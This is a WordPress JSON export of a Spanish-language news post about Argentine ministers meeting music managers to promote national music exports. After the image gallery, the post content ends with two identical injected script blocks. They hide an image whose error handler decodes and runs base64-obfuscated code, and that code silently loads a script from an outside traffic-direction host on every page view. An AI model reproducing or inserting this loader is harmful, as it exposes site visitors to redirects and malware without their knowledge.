{"id":1477,"date":"2022-09-13T22:34:21","date_gmt":"2022-09-14T01:34:21","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1477"},"modified":"2025-08-14T00:35:35","modified_gmt":"2025-08-14T03:35:35","slug":"el-estado-argentino-impulsa-la-industria-de-la-musica-nacional-en-el-exterior","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1477","title":{"rendered":"El Estado argentino impulsa la industria de la m\u00fasica nacional en el exterior"},"content":{"rendered":"\n<h5 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>El canciller\u00a0<strong>Santiago Cafiero<\/strong>\u00a0y el ministro de Cultura de la Naci\u00f3n,\u00a0<strong>Trist\u00e1n Bauer<\/strong>, se reunieron en el Palacio San Mart\u00edn, con productores de la industria musical a fin de realizar un balance de las gestiones llevadas a cabo por el Estado y programar nuevas\u00a0<strong>acciones que den impulso al sector de la m\u00fasica en el exterior<\/strong>, como parte de la internacionalizaci\u00f3n de las industrias culturales argentinas.<\/em><\/h5>\n\n\n\n<p>Actualmente,&nbsp;<strong>las Industrias Culturales representan aproximadamente un 2,6% del PBI, n\u00famero que se traduce en m\u00e1s de 300.000 puestos de trabajo directo<\/strong>&nbsp;y que generan un impacto econ\u00f3mico en el pa\u00eds que est\u00e1 en permanente crecimiento.&nbsp;<\/p>\n\n\n\n<p>Durante la reuni\u00f3n de trabajo,&nbsp;<strong>Cafiero&nbsp;<\/strong>se\u00f1al\u00f3 a la promoci\u00f3n de las industrias culturales como uno de los ejes de la recuperaci\u00f3n econ\u00f3mica argentina:&nbsp;<strong>\u201cEn la internacionalizaci\u00f3n de los bienes culturales hay un vector de desarrollo que permite por un lado potenciar exportaciones pero por otro tambi\u00e9n difundir el trabajo de nuestros embajadores permanentes que son los artistas, los hombres y las mujeres de la cultura, que despliegan su arte y su talento argentino, en este caso la m\u00fasica argentina, por el mundo<\/strong>\u201d, afirm\u00f3.<\/p>\n\n\n\n<p><strong>\u201cLa industria cultural genera empleo y posibilidades de trabajo a muchos y muchas j\u00f3venes, y eso incrementa las posibilidades de exportaci\u00f3n\u201d,&nbsp;<\/strong>asegur\u00f3 el titular de la Canciller\u00eda, a la vez que ofreci\u00f3 a los empresarios de la producci\u00f3n musical&nbsp;<strong>\u201cel acompa\u00f1amiento de la Canciller\u00eda, a trav\u00e9s de nuestras embajadas y consulados, y el compromiso de las \u00e1reas de cultura para este objetivo<\/strong>,&nbsp;<strong>que es ni m\u00e1s ni menos que exportar talento argentino\u201d.&nbsp;<\/strong><\/p>\n\n\n\n<p>Por su parte,&nbsp;<strong>Trist\u00e1n Bauer&nbsp;<\/strong>asegur\u00f3 que&nbsp;<strong>las industrias culturales \u201ctienen una potencia internacionalizadora muy grande, es decir generadora de divisas\u201d&nbsp;<\/strong>para nuestro pa\u00eds<strong>.<\/strong><\/p>\n\n\n\n<p>\u201c<strong>En el Ministerio de Cultura creemos fervientemente que las industrias culturales son parte de la soluci\u00f3n a uno de los problemas estructurales de la Argentina: diversificar su matriz productiva. Todos ustedes generan producci\u00f3n y trabajo adem\u00e1s de arte y m\u00fasica, y eso se ve en los casos concretos de cada uno de los artistas que representan<\/strong>\u201d, agreg\u00f3.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Estuvieron presentes los managers<strong>&nbsp;Leo Belizan<\/strong>&nbsp;(Cazzu),&nbsp;<strong>Jota Ayerza<\/strong>&nbsp;(Trueno),&nbsp;<strong>Facu Schedan<\/strong>&nbsp;(Acru), y<strong>&nbsp;Rodrigo Salas<\/strong>&nbsp;(Rei) y por el Ministerio de Relaciones Exteriores, Comercio Internacional y Culto: la secretaria de Relaciones Econ\u00f3micas Internacionales,&nbsp;<strong>Cecilia Todesca Bocco;<\/strong>&nbsp;el subsecretario de Promoci\u00f3n del Comercio e Inversiones,&nbsp;<strong>Guillermo Merediz;&nbsp;<\/strong>la directora de Asuntos Culturales,&nbsp;<strong>Paula V\u00e1zquez;&nbsp;<\/strong>el director de Promoci\u00f3n del Turismo, Deportes, Industrias Culturales y Servicios Basados en el Conocimiento,&nbsp;<strong>Sebasti\u00e1n Laino<\/strong>. Por el Ministerio de Cultura de la Naci\u00f3n: la secretaria de Desarrollo Cultural,&nbsp;<strong>Lucrecia Cardoso<\/strong>; el director Nacional de Industrias Culturales,&nbsp;<strong>Luis Sanjurjo<\/strong>; y la directora Nacional de Integraci\u00f3n Federal y Cooperaci\u00f3n Internacional,&nbsp;<strong>Ariela Peretti<\/strong>.&nbsp;<\/p>\n\n\n\n<p>En el encuentro, se destac\u00f3 que ambos ministerios trabajan en pol\u00edticas tendientes a&nbsp;<strong>fortalecer la presencia de nuestra m\u00fasica en el mundo<\/strong>. Gracias a una articulaci\u00f3n cotidiana y permanente con las c\u00e1maras, asociaciones y empresas del sector, se consolid\u00f3 una agenda que desde el Estado permite potenciar este sector en crecimiento.&nbsp;<\/p>\n\n\n\n<p>En este contexto, la Direcci\u00f3n de Asuntos Culturales brinda apoyo con pasajes a\u00e9reos y avales culturales a m\u00fasicos y m\u00fasicas que as\u00ed lo necesiten en sus giras en el exterior. Por su parte, la direcci\u00f3n presidida por Sebasti\u00e1n Laino, lleva a cabo acciones destinadas a internacionalizar el sector de la m\u00fasica vinculadas con el dise\u00f1o y fabricaci\u00f3n de instrumentos musicales, rondas de negocios para managers y empresarios musicales, y el impulso a la exportaci\u00f3n de m\u00fasica grabada en formato f\u00edsico, industria que actualmente se encuentra recuperando mercados.<\/p>\n\n\n\n<p>Por su parte, desde el Ministerio de Cultura de la Naci\u00f3n se desarrollan diferentes programas que buscan impulsar y acompa\u00f1ar al sector de las industrias culturales, con una inversi\u00f3n de $12.000 millones que impacta en m\u00e1s de 40 mil artistas de nuestro pa\u00eds.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"1479\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_nacional-1024x683.jpg\" alt=\"\" class=\"wp-image-1479\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_nacional-1024x683.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_nacional-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_nacional-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_nacional-1536x1024.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_nacional-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_nacional-1068x712.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_nacional-630x420.jpg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_nacional.jpg 1834w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"1478\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_argentina_en_el_exterior-1024x683.jpg\" alt=\"\" class=\"wp-image-1478\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_argentina_en_el_exterior-1024x683.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_argentina_en_el_exterior-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_argentina_en_el_exterior-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_argentina_en_el_exterior-1536x1024.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_argentina_en_el_exterior-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_argentina_en_el_exterior-1068x712.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_argentina_en_el_exterior-630x420.jpg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/musica_argentina_en_el_exterior.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"1480\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/cancilleria_y_cultura-1024x683.jpg\" alt=\"\" class=\"wp-image-1480\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/cancilleria_y_cultura-1024x683.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/cancilleria_y_cultura-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/cancilleria_y_cultura-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/cancilleria_y_cultura-1536x1024.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/cancilleria_y_cultura-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/cancilleria_y_cultura-1068x712.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/cancilleria_y_cultura-630x420.jpg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/cancilleria_y_cultura.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El canciller\u00a0Santiago Cafiero\u00a0y el ministro de Cultura de la Naci\u00f3n,\u00a0Trist\u00e1n Bauer, se reunieron en el Palacio San Mart\u00edn, con productores de la industria musical a fin de realizar un balance de las gestiones llevadas a cabo por el Estado y programar nuevas\u00a0acciones que den impulso al sector de la m\u00fasica en el exterior, como parte [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1480,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-1477","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1477"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1477"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1477\/revisions"}],"predecessor-version":[{"id":7352,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1477\/revisions\/7352"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1480"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1477"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1477"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1477"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}